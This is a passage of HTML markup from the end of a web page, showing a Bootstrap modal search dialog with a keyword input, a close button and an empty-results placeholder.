    <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
        <div class="modal-content overflow-auto">
            <div class="modal-header">
                <input type="text" class="form-control" placeholder="Searching Keywords..." id="searchInput">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><i class="fas fa-times"></i></button>
            </div>
            <div class="modal-body">
                <div id="searchResult">
                    <div class="search-empty text-center text-muted p-5">
                        <i class="far fa-meh"></i>
                    </div>
                </div>
            </div> 
        </div>
    </div>
</div>


</body>
</html>
